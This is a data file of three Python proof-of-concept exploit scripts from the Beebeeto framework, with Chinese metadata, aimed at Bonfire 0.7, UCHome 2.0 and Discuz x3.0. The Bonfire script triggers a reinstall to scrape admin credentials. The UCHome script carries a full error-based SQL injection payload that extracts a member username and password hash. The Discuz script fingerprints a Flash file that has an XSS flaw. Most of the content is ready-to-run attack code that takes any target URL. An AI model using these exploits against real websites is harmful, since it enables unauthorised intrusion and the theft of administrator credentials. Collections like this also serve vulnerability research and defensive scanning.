{"create_date": "2014-09-17 17:26:28", "name": "Bonfire 0.7 /install.php \u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "1024", "rank": 4, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "Bonfire,\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0005',\r\n 'name': 'Bonfire 0.7 /install.php \u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e POC',\r\n 'author': '1024',\r\n 'create_date': '2014-08-01',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Bonfire', \r\n 'vul_version': ['0.7'],\r\n 'type': 'Information Disclosure',\r\n 'tag': ['Bonfire', '\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e'],\r\n 'desc': '\u7531\u4e8einstall.php\u5b89\u88c5\u6587\u4ef6\u5bf9\u5df2\u5b89\u88c5\u7684\u7a0b\u5e8f\u8fdb\u884c\u68c0\u6d4b\u540e\u6ca1\u6709\u505a\u597d\u540e\u7eed\u5904\u7406\uff0c\u5bfc\u81f4\u6267\u884c/install/do_install\u7684\u65f6\u5019\u5f15\u53d1\u91cd\u5b89\u88c5\u800c\u66b4\u9732\u7ba1\u7406\u5458\u4fe1\u606f\u3002',\r\n 'references': ['http://www.mehmetince.net/ci-bonefire-reinstall-admin-account-vulnerability-analysis-exploit/',\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = args['options']['target'] + '/index.php/install/do_install'\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n try:\r\n content = urllib2.urlopen(urllib2.Request(verify_url)).read()\r\n except Exception, e:\r\n content = ''\r\n args['success'] = False\r\n return args\r\n\r\n if content:\r\n regular = re.findall('Your Email:\\s+<b>(.*?)</b><br/>\\s+Password:\\s+<b>(.*?)</b>', content)\r\n if regular:\r\n (username, password) = regular[0]\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n args['poc_ret']['Username'] = username\r\n args['poc_ret']['Password'] = password\r\n return args\r\n else:\r\n args['success'] = False\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())\r\n", "desc": "\u7531\u4e8einstall.php\u5b89\u88c5\u6587\u4ef6\u5bf9\u5df2\u5b89\u88c5\u7684\u7a0b\u5e8f\u8fdb\u884c\u68c0\u6d4b\u540e\u6ca1\u6709\u505a\u597d\u540e\u7eed\u5904\u7406\uff0c\u5bfc\u81f4\u6267\u884c/install/do_install\u7684\u65f6\u5019\u5f15\u53d1\u91cd\u5b89\u88c5\u800c\u66b4\u9732\u7ba1\u7406\u5458\u4fe1\u606f\u3002", "app_name": "Bonfire", "id": "poc-2014-0005", "layer4_protocol": null}
{"create_date": "2014-09-17 16:49:20", "name": "UCHome 2.0 /source/cp_profile.php SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u9ad8\u5371", "batchable": 0, "author": "win95", "rank": 6, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "UCenter Home,SQL,SQLinjection,SQL\u6ce8\u5165\u6f0f\u6d1ePOC", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0004', # \u7531Beebeeto\u5b98\u65b9\u7f16\u8f91\r\n 'name': 'UCHome 2.0 /source/cp_profile.php SQL\u6ce8\u5165\u6f0f\u6d1e POC', # \u540d\u79f0\r\n 'author': 'windows95', # \u4f5c\u8005\r\n 'create_date': '2014-08-05', # \u7f16\u5199\u65e5\u671f\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http', # \u8be5\u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u534f\u8bae\u540d\u79f0\r\n 'port': [80], # \u8be5\u534f\u8bae\u5e38\u7528\u7684\u7aef\u53e3\u53f7\uff0c\u9700\u4e3aint\u7c7b\u578b\r\n 'layer4_protocol': ['tcp'], # \u8be5\u534f\u8bae\u6240\u4f7f\u7528\u7684\u7b2c\u4e09\u5c42\u534f\u8bae\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Discuz UCenter Home', # \u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u5e94\u7528\u540d\u79f0\r\n 'vul_version': ['2.0'], # \u53d7\u6f0f\u6d1e\u5f71\u54cd\u7684\u5e94\u7528\u7248\u672c\r\n 'type': 'SQL Injection', # \u6f0f\u6d1e\u7c7b\u578b\r\n 'tag': ['UCenter Home', 'sql', 'SQL\u6ce8\u5165\u6f0f\u6d1e'], # \u6f0f\u6d1e\u76f8\u5173tag\r\n 'desc': 'UCHOME \u4fee\u6539\u4e2a\u4eba\u8d44\u6599\u5904 info \u53c2\u6570\u672a\u7ecf\u8fc7\u8fc7\u6ee4\u5bfc\u81f4 SQL \u6ce8\u5165\u6f0f\u6d1e\u7684\u53d1\u751f\uff0c\u53ef\u4ee5\u83b7\u53d6\u7ba1\u7406\u5458\u7684\u8d26\u53f7\u5bc6\u7801\u3002', # \u6f0f\u6d1e\u63cf\u8ff0\r\n 'references': ['http://wooyun.org/bugs/wooyun-2014-069193', # \u53c2\u8003\u94fe\u63a5\r\n ],\r\n },\r\n }\r\n\r\n def _init_user_parser(self): # \u5b9a\u5236\u547d\u4ee4\u884c\u53c2\u6570\r\n self.user_parser.add_option('-c','--cookie',\r\n action='store', dest='cookie', type='string', default=None,\r\n help='this poc need to login, so special cookie '\r\n 'for target must be included in http headers.')\r\n\r\n @classmethod\r\n def verify(cls, args): # \u5b9e\u73b0\u9a8c\u8bc1\u6a21\u5f0f\u7684\u4e3b\u51fd\u6570\r\n payload = 'name=&marry=1&friend%5Bmarry%5D=0&birthyear=1989&birthmonth=2&birthday=1&friend%5B' \\\r\n 'birth%5D=0&blood=A&friend%5Bblood %5D=0&birthprovince=%C7%E0%BA%A3&birthcity=%B5%C' \\\r\n '2%C1%EE%B9%FE&friend%5Bbirthcity%5D=0&resideprovince=%C7%E0%BA%A3&residec ity=%B5%' \\\r\n 'C2%C1%EE%B9%FE&friend%5Bresidecity%5D=0&profilesubmit=%B1%A3%B4%E6&formhash={hash}' \\\r\n '&info[0\\',0,(select (1) from mysql.user where 1%3d1 and (SELECT 1 FROM (select cou' \\\r\n 'nt(*),concat(floor(rand(0)*2),(substring((Select (md5(56311223))),1,62))) a from i' \\\r\n 'nformation_schema.tables group by a)b)))#]=aaa'\r\n\r\n vul_url = '{url}/cp.php?ac=profile&op=info&ref'.format(url=args['options']['target'])\r\n hash_url = '{url}/cp.php?ac=profile&op=base'.format(url=args['options']['target'])\r\n match_hash = re.compile('name=\"formhash\" value=\"([\\d\\w]+)\"')\r\n\r\n if args['options']['verbose']: # \u662f\u5426\u9700\u8981\u8f93\u51fa\u8be6\u7ec6\u4fe1\u606f\r\n print '[*] {url} - Getting formhash ...'.format(url=args['options']['target'])\r\n request = urllib2.Request(hash_url, headers={'Cookie': args['options']['cookie']}) # \u8c03\u7528\u4f20\u5165\u7684cookie\r\n response = urllib2.urlopen(request).read()\r\n form_hash = match_hash.findall(response)\r\n if not form_hash:\r\n args['success'] = False\r\n return args\r\n raise Exception(\"Get the formhash fail!\")\r\n\r\n if args['options']['verbose']:\r\n print '[*] {url} - The formhash is {form_hash}'.format(url=args['options']['target'], form_hash=form_hash[0])\r\n print '[*] {url} - Executing payload ...'.format(url=args['options']['target'])\r\n request = urllib2.Request(url=vul_url, headers={'Cookie': args['options']['cookie']}, data=payload.format(hash=form_hash[0]))\r\n response = urllib2.urlopen(request).read()\r\n if '14c711768474fac3bf03094625bc1aeaa' in response:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = args['options']['target']\r\n return args\r\n else:\r\n args['success'] = False\r\n return args\r\n\r\n @classmethod\r\n def exploit(cls, args): # \u5b9e\u73b0exploit\u6a21\u5f0f\u7684\u4e3b\u51fd\u6570\r\n vul_url = '{url}/cp.php?ac=profile&op=info&ref'.format(url=args['options']['target'])\r\n hash_url = '{url}/cp.php?ac=profile&op=base'.format(url=args['options']['target'])\r\n match_hash = re.compile('name=\"formhash\" value=\"([\\d\\w]+)\"')\r\n\r\n payload = 'name=&marry=1&friend%5Bmarry%5D=0&birthyear=1989&birthmonth=2&birthday=1&friend%5B' \\\r\n 'birth%5D=0&blood=A&friend%5Bblood %5D=0&birthprovince=%C7%E0%BA%A3&birthcity=%B5%C' \\\r\n '2%C1%EE%B9%FE&friend%5Bbirthcity%5D=0&resideprovince=%C7%E0%BA%A3&residec ity=%B5%' \\\r\n 'C2%C1%EE%B9%FE&friend%5Bresidecity%5D=0&profilesubmit=%B1%A3%B4%E6&formhash={hash}' \\\r\n '&info[0\\',0,(select (1) from mysql.user where 1%3d1 and (SELECT 1 FROM (select cou' \\\r\n 'nt(*),concat(floor(rand(0)*2),(substring((Select (select concat(username,0x3a3a,pa' \\\r\n 'ssword) from uchome_member limit 0,1)),1,62))) a from information_schema.tables gr' \\\r\n 'oup by a)b)))#]=aaa'\r\n if args['options']['verbose']:\r\n print '[*] {url} - Getting formhash ...'.format(url=args['options']['target'])\r\n request = urllib2.Request(hash_url, headers={'Cookie': args['options']['cookie']})\r\n response = urllib2.urlopen(request).read()\r\n form_hash = match_hash.findall(response)\r\n if not form_hash:\r\n args['success'] = False\r\n return args\r\n raise Exception(\"Get the formhash fail!\")\r\n if verbose:\r\n print '[*] {url} - The formhash is {form_hash}'.format(url=args['options']['target'], form_hash=form_hash[0])\r\n print '[*] {url} - Executing payload ...'.format(url=args['options']['target'])\r\n request = urllib2.Request(url=vul_url, headers={'Cookie': args['options']['cookie']}, data=payload.format(hash=form_hash[0]))\r\n response = urllib2.urlopen(request).read()\r\n match_data = re.compile('entry \\'1(.*)::([\\w\\d]{32})\\' for')\r\n data = match_data.findall(response)\r\n\r\n if data:\r\n args['success'] = True\r\n args['poc_ret']['username'] = data[0][0]\r\n args['poc_ret']['password'] = data[0][1]\r\n return args\r\n else:\r\n args['success'] = False\r\n return args\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())\r\n", "desc": "UCHOME \u4fee\u6539\u4e2a\u4eba\u8d44\u6599\u5904 info \u53c2\u6570\u672a\u7ecf\u8fc7\u8fc7\u6ee4\u5bfc\u81f4 SQL \u6ce8\u5165\u6f0f\u6d1e\u7684\u53d1\u751f\uff0c\u53ef\u4ee5\u83b7\u53d6\u7ba1\u7406\u5458\u7684\u8d26\u53f7\u5bc6\u7801\u3002", "app_name": "Discuz", "id": "poc-2014-0004", "layer4_protocol": null}
{"create_date": "2014-09-17 15:56:07", "name": "Discuz x3.0 /static/image/common/focus.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "1024", "rank": 4, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "Discuz,XSS,Flash XSS", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport md5\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0001',\r\n 'name': 'Discuz x3.0 /static/image/common/focus.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC',\r\n 'author': '1024',\r\n 'create_date': '2014-08-01',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Discuz', \r\n 'vul_version': ['x3.0'],\r\n 'type': 'Cross Site Scripting',\r\n 'tag': ['Discuz!', 'xss', 'flash xss'],\r\n 'desc': 'DiscuzX3.0 static/image/common/focus.swf\u6587\u4ef6\u5b58\u5728FlashXss\u6f0f\u6d1e\u3002',\r\n 'references': ['http://www.ipuman.com/pm6/137/',\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n flash_md5 = \"c16a7c6143f098472e52dd13de85527f\"\r\n file_path = \"/static/image/common/focus.swf\"\r\n verify_url = args['options']['target'] + file_path\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n request = urllib2.Request(verify_url)\r\n response = urllib2.urlopen(request)\r\n content = response.read()\r\n md5_value = md5.new(content).hexdigest()\r\n if md5_value in flash_md5:\r\n args['success'] = True\r\n args['poc_ret']['xss_url'] = verify_url\r\n return args\r\n else:\r\n args['success'] = False\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())\r\n", "desc": "\u6b64\u6f0f\u6d1e\u51fa\u73b0\u5728\uff1aDiscuz_X3.0_SC_GBK \\upload\\static\\image\\common\\focus.swf", "app_name": "Discuz", "id": "poc-2014-0001", "layer4_protocol": null}